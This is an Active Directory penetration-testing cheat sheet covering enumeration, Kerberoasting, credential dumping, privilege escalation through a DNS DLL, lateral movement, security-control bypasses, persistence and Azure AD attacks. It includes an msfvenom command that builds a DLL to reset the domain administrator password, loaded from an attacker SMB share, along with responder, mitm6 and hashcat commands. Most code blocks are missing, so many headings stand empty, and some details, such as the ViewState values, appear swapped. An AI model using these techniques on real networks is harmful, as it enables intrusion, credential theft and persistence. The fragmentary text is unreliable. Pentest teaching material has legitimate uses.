AD Exploitation Cheat Sheet by RistBS
Powershell tools :
nishang has multiples useful scripts for windows pentesting in Powershell environement.
powerview is a script from powersploit that allow enumeration of the AD architecture for a potential lateral mouvement.
Enumeration tools :
AD exploitation toolkit :
Dumping Tools :
Listener Tool :
Powershell Components
Powershell Tricks
PS-Session :
allow anyone with creds to connect to any machine and any config
[ ! ] this action require credentials.
Find user with SPN
using :
using :
Trusts Enumeration
MapTrust :
Domain trusts for the current domain :
using :
using :
Forest Enumeration
Details about the current forest :
GPO enumeration
List of GPO
ACL and ACE enumeration
Enumerate All ACEs
Enumerate users and permissions
Verify if the user already has a SPN :
using :
using :
LDAP Enumeration
find service accounts
Enumeration with ldapsearch as authenticated user
Enumeration with ldapdomaindump (authenticated) with nice output
Enumeration with nmap scripts
SMB Enumeration
enumeration with crackmapexec as unauthenticated
enumeration with crackmapexec (authenticated)
enumeration with kerbrute, against Kerberos pre-auth bruteforcing:
by default, kerbrute uses the most secure mode (18 = sha1) to pull some hash. Using the downgrade option we can pull the deprecaded encryption type version (23 = rc4hmac). Or use getNPusers to get some hash instead, it's safer!
provide a password or a list of passwords to test against users
Enumerate some users
Password Spraying on the domain
Dump Domain, Groups and Users using Bloodhound-Python:
Setting up Bloodhound:
Global Structure :
S-1-5-21: S refers SID (Security Identifier)
40646273370-24341400410-2375368561: Domain or Local Computer Identifier
User SID Structure :
S-1-5-21-40646273370-24341400410-2375368561: Domain SID
using :
using :
the value "20000" in lookupsid is to indicate how many RID will be tested
Privilege Escalation
Token Impersonation
The Impersonation token technique allows to impersonate a user by stealing his token, this token allows to exploit this technique because of the SSO processes, Interactive Logon, process running...
using :
list tokens
Start a new process with the token of a user
process token manipulation
using :
load incognito and list tokens :
impersonate token of "NT AUTHORITY\SYSTEM" :
Enumerate kerberoastable user
using :
using
crack the hash :
Enumerate asreproastable user
cracking the hash :
hashcat -m 18200 -a 0 hash wordlist.txt --force
Enumerate users in this group :
This attack consists of injecting a malicious arbitrary DLL and restarting the dns.exe service, since the DC serves as a DNS service, we can elevate our privileges to a DA.
DLL File :
you can also create a dll file using msfvenom : msfvenom -p windows/x64/exec cmd='net user administrator aked /domain' - f dll > evil.dll it'll execute net user administrator aked /domain with SYSTEM privileges
set the remote DLL path into the Windows Registry
\\10.10.14.33\share\evil.dll : SMB Share.
restart DNS service
Lateral Mouvement
uses kerberos auth
Credentials Dumping
parse creds with mimikatz
you can do it locally with mimikatz using : sekurlsa::logonpasswords.
Abusing DRSUAPI for NTDS dumping
Abusing VSS for NTDS dumping
using Crackmapexec :
you can do it manually too.
dump DPAPI BK
Decrypt DPAPI MK
decrypting protected file using MK
crack DPAPI master key with JTR
you can use mimikatz with this command : lsadump::secrets
save SYSTEM hive and SAM in another directory
or just use : lsadump::sam
[ 📝 ] Notes : you can dump SAM and LSA with crackmapexec or secretdump using these commands :
Dump Registry Remotely and Directly
[ ❓ ] What is Registry ? : the Registry is divided into several sections called hives. A registry hive is a top level registry key predefined by the Windows system to store registry keys for specific objectives. Each registry hives has specific objectives, there are 6 registry hives, HKCU, HKLM, HKCR, HKU, HKCC and HKPD the most enteresting registry hives in pentesting is HKU and HKLM.
HKEY_LOCAL_MACHINE called HKLM includes three keys SAM, SYSTEM, and SECURITY.
dump SYSTEM and SECURITY remotely from HKLM :
dump HKU registry remotely with hashes argument :
Read GMSA Password
gMSA dumping:
LM :
NT :
NTLMv1 :
NTLMv2 :
note : some Hash Type in hashcat depend of the etype
Bruteforce AD Password
Custom Username and Password wordlist
default password list (pwd_list) : Autumn Spring Winter Summer create passwords using bash & hashcat :
default username list (users.list) :
create custom usernames using username-anarchy :
Pivot with WDFW via custom rules
allow connections to localport
Local/Remote ports can be forwarded using SMB pipes. You can use or for that.
Invoke-Piper : used to forward local or remote ports
Invoke-SocksProxy : used for dynamic port forwarding
Case 1 Local port forwarding through pipe forPivot: -L 33389:127.0.0.1:3389
SERVER SIDE :
CLIENT SIDE :
Case 2 Admin only remote port forwarding through pipe forPivot: -R 33389:127.0.0.1:3389
SERVER SIDE :
CLIENT SIDE :
Case 3 Dynamic port forwarding with Invoke-SocksProxy with forPivot as NamedPipe: -D 3333
SERVER SIDE :
CLIENT SIDE :
SharpSocks is mostly used in C2 Frameworks and work with C2 Implants
build a server:
RDP Tunneling via DVC
sharings drives:
map the drives:
create a server with SSFD.exe
Redirect SSF port with DVC server:
SSFD as a SOCK proxy
SIDHistory Injection
AdminSDHolder and SDProp
[ ❓ ] : With DA privileges (Full Control/Write permissions) on the AdminSDHolder object, it can be used as a backdoor/persistence mechanism by adding a user with Full Permissions (or other interesting permissions) to the AdminSDHolder object. In 60 minutes (when SDPROP runs), the user will be added with Full Control to the AC of groups like Domain Admins without actually being a member of it.
using :
using :
Run SDProp manually
ACLs and ACEs Abusing
list all groups to which the user belongs and has explicit access rights
Enhanced Security Bypass
AntiMalware Scan Interface
patching AMSI from Powershell6 :
ConstrainLanguageMode
Bypass CLM using runspace:
Just Enough Administration
show current languages level :
Bypass JEA in ConstrainedLanguage :
ExecutionPolicy
bypass EP using encoding :
RunAsPPL for Credentials Dumping
[ ❓ ] : is an additional LSA protection to prevent reading memory and code injection by non-protected processes.
bypass RunAsPPL with mimikatz :
you can try obfuscation techniques on this command. To learn more about ETW see my course
OWA EWS and EAS Password Spraying
using :
using :
GAL and OAB Extraction
GAL (Global Address Book) Extraction
using powershell :
OAB (Offline Address Book) Extraction
extract OAB.XML file which contains records
extract LZX compressed file
using :
use PushSubscription Feature, a user is able to capture the NTLM authentication data of an Exchange server With a simple call to the "PushSubscription" API
is the name given to CVE-2021-26855 that allows an attacker to bypass authentication and impersonate users on MS Exchange servers
using metasploit:
this CVE allow RCE on EWS through fixed cryptographic keys
Get Values for RCE :
ViewStateUserKey : document.getElementById("_VIEWSTATEGENERATOR").value
ViewStateGenerator : ASP.NET_SessionId
UNC Path Injection
[ ❓ ] : Uniform Naming Convention allows the sharing of resources on a network via a very precise syntax: \IP-Server\shareName\Folder\File
launch responder : responder -I eth0
MC-SQLR Poisoning
The SQL Server Resolution Protocol is a simple application-level protocol that is used for the transfer of requests and responses between clients and database server discovery services.
we captured the hash of the Administrator with this VBA script.
DML, DDL and Logon Triggers
[ ❓ ] : Triggers are a stored procedure that automatically executes when an event occurs in the SQL Server.
Data Definition Language (DDL) – Executes on Create, Alter and Drop statements and some system stored procedures.
Data Manipulation Language (DML) – Executes on Insert, Update and Delete statements.
Logon Triggers – Executes on a user logon.
Triggers Listing
list All triggers
list triggers for a database
list DDL and DML triggers on an instance using powershell
use DML triggers for persistence
use DDL triggers for persistence
use Logon triggers for persistence
Forest Persistence
DCShadow temporarily registers a new domain controller in the target domain and uses it to "push" attributes like SIDHistory, SPNs... on specified objects without leaving the change logs for modified object!
⚠️ Requirements :
DA privileges are required to use DCShadow.
The attacker's machine must be part of the root domain.
The attack needs 2 instances on a compromised machine :
1 instance : start RPC servers with SYSTEM privileges and specify attributes to be modified
2 instance : with enough privileges of DA to push the values :
Cross Forest Attacks
Dumping Trust Key
Forging IR-TGT using Trust key
get TGS for CIFS service
use TGS for CIFS service
Using KRBTGT hash
Azure Active Directory
AZ User Enumeration
connection to Azure Active Directory with Connect-MsolService.
this command allow enumeration with MFA (MultiFactor Authentification)
locate Azure AD Connect Server
Enumeration using AZ CLI
Storage Enumeration
blob storage enumeration
create a new user
Executes a command on a specified VM
⚠️ Requirements :
Admin privileges of ADFS server
Obtain ADFS Public Certificate:
Obtain IdP Name:
Obtain Role Name:
a toolkit to exploit Golden SAML can be found
** Golden SAML is similar to golden ticket and affects the Kerberos protocol. Like the Golden Ticket, the Golden SAML allows an attacker to access resources protected by SAML agents (examples: Azure, AWS, vSphere, Okta, Salesforce, ...) with elevated privileges through a golden ticket.**
ShockNAwe:
Remotely extracts the AD FS configuration settings
WhiskeySAML:
Remotely extract AD FS configuration settings
PRT Manipulation
PassThePRT
check AzureAdJoined Status and download Mimikatz:
Looking for prt and KeyValue:
use APKD function to decode KeyValue and save "Context" and "DerivedKey" value:
Forge PRT-Cookie using :
Generate JWT
MSOL Service Account
you can dump MSOL Service account with used by Azure AD Connect Sync and launch a DCsync attack with the dumped creds
DCSync with MSOL account
Domain Level Attribute
MachineAccountQuota (MAQ) Exploitation
use crackmapexec (CME) with maq module :
cme ldap $dc -d $DOMAIN -u $USER -p $PASSWORD -M maq
BadPwdCount
Abusing IPv6 in AD
sending ICMPv6 packet to the target using ping6 :
ping6 -c 3 <target>
scanning IPv6 address using nmap :
nmap -6 -sCV dead:beef:0000:0000:b885:d62a:d679:573f --max-retries=2 --min-rate=3000 -Pn -T3
tips for adapting tools for ipv6 :
you can replace AF_INET value to AF_INET6 from socket python lib :
Rogue DHCP
mitm6 -i eth0 -d 'domain.job.local'
IOXIDResolver Interface Enumeration
it's a little script that enumerate addresses in NetworkAddr field with level